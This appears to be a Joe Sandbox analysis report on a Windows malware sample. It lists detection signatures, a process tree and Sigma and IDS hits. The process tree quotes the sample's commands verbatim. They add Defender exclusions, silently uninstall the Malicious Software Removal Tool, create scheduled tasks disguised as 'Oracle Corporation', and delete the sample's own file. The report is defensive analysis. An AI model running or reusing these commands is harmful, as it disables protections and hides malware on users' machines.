Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sE5IdDeTp2.exe

Overview

General Information

Sample name:sE5IdDeTp2.exe
renamed because original name is a hash value
Original sample name:dd36f6f79e68d5e54c75527db2da97ad.exe
Analysis ID:1589501
MD5:dd36f6f79e68d5e54c75527db2da97ad
SHA1:a373e613510ada66cea74ffc590c25edc59957ac
SHA256:3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
Tags:exeuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Exploit detected, runtime environment starts unknown processes
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • sE5IdDeTp2.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 6036 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7292 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • schtasks.exe (PID: 7220 cmdline: C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7308 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7352 cmdline: C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7440 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • dialer_java.exe (PID: 7448 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
  • dialer_java.exe (PID: 7468 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 7480 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7684 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • schtasks.exe (PID: 7628 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7816 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8088 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8136 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7192 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7508 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7412 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4324 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2028 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2352 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7944 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7836 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8112 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6696 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7264 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7192 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7116 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7480 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5024 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer_java.exe (PID: 8184 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 2836 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7448 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • Conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7424 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer_java.exe (PID: 7560 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 7580 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5436 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4348 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • schtasks.exe (PID: 1420 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer_java.exe (PID: 8140 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 8168 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7212 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • schtasks.exe (PID: 7420 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer_java.exe (PID: 1712 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 7376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7608 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • schtasks.exe (PID: 3396 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer_java.exe (PID: 2676 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)
    • powershell.exe (PID: 2028 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7852 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • Conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7904 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6036, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6036, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", ProcessId: 7308, ProcessName: schtasks.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 5316, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6036, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-12T17:38:28.464034+010020283713Unknown Traffic192.168.2.449731173.244.207.29443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeReversingLabs: Detection: 36%
Source: sE5IdDeTp2.exeReversingLabs: Detection: 36%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140033FF0 BCryptCloseAlgorithmProvider,free,free,25_2_0000000140033FF0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140035010 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,25_2_0000000140035010
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140034050 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,25_2_0000000140034050
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140035080 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptOpenAlgorithmProvider,BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptGetProperty,malloc,BCryptCreateHash,25_2_0000000140035080
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400340C0 BCryptEncrypt,BCryptEncrypt,25_2_00000001400340C0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140034200 BCryptEncrypt,25_2_0000000140034200
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140035220 BCryptHashData,25_2_0000000140035220
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140035270 BCryptGetProperty,BCryptFinishHash,25_2_0000000140035270
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400342C0 BCryptDecrypt,BCryptDecrypt,25_2_00000001400342C0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140035340 BCryptDestroyHash,BCryptDuplicateHash,25_2_0000000140035340
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400353D0 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,25_2_00000001400353D0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140034400 BCryptDecrypt,25_2_0000000140034400
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400344C0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,25_2_00000001400344C0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140034A20 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,25_2_0000000140034A20
